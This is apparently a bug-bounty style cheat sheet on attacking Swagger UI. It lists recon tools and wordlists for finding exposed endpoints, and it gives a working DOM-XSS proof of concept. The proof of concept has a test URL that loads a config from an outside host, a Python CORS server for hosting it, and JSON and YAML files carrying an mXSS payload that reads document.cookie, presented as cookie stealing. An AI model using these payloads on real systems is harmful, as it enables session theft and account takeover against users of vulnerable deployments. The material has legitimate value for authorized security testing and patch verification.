Swagger UI

Nuclei template

nuclei-templates/Swagger.yaml at main · coffinxp/nuclei-templatesGitHub

Find Exposed Swagger

GitHub - brinhosa/apidetector: APIDetector: Efficiently scan for exposed Swagger endpoints across web domains and subdomains. Supports HTTP/HTTPS, multi-threading, and flexible input/output options. Ideal for API security testing.GitHub

Wordlist

SecLists/Discovery/Web-Content/swagger.txt at master · danielmiessler/SecListsGitHub

OSINT

GitHub - UndeadSec/SwaggerSpy: Automated OSINT on SwaggerHubGitHub

Audit endpoints

GitHub - BishopFox/sj: A tool for auditing endpoints defined in exposed (Swagger/OpenAPI) definition files.GitHub

REST API

Get versions and their vulnerabilities.

GitHub - ArcHound/swagger-ui-detector: Swagger-ui scanner - get versions and their vulnerabilities.GitHub

Find old versions of Swagger-ui vulnerable to various XSS attacks - XSSwagger

GitHub - vavkamil/XSSwagger: A simple Swagger-ui scanner that can detect old versions vulnerable to various XSS attacksGitHub

CVE-2018-25031

Swagger UI 4.1.2 and earlier could allow a remote attacker to conduct spoofing attacks.

Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical InformationExploit Database

Hacking Swagger-UI - from XSS to account takeoversVidoc Security Lab

How I was able to steal users credentials via Swagger UI DOM-XSSMedium

Test: /api/docs/?configUrl=https://jumpy-floor.surge.sh/test.json

Cookie Stealing

Server with CORS Header

from http.server import SimpleHTTPRequestHandler
import socketserver
class CORSRequestHandler(SimpleHTTPRequestHandler):
 def end_headers(self): 
 self.send_header('Access-Control-Allow-Origin', '*') 
 self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS') 
 super().end_headers()
if name == "__main__":
 PORT = 80 
 with socketserver.TCPServer(("", PORT), CORSRequestHandler) as httpd: 
 print("Serving at port", PORT) 
 httpd.serve_forever()

POC: test.json

{ 
    "url": "http://IP/test.yaml", 
    "urls": [ 
    { 
    "url": "http://IP/test.yaml", 
    "name": "Foo" 
    } 
    ]
}

POC: test.yaml

swagger: '2.0'
info:
 title: XSS Attack BY 0xss0rz
 description: | 
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form> 
 version: production
basePath: /JSSResource/
produces:
 - application/xml
 - application/json
consumes:
 - application/xml
 - application/json
security: - basicAuth: []
paths:
 /M0X0101:
  get:
   responses:
    '200':
     description: No response was specified
   tags: - XSS_D 
   operationId: findAccounts
   summary: Finds all accounts 
 '/hack/hachid/{id}':
  delete:
   parameters:
    - description: |
       <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
      format: int64 
      in: path 
      name: id 
      required: true 
      type: integer 
   responses:
    '200':
      description: No response was specified

Could lead to CSS exfiltration

GitHub - tarantula-team/CSS-injection-in-Swagger-UI: CSS injection vulnerability in Swagger UIGitHub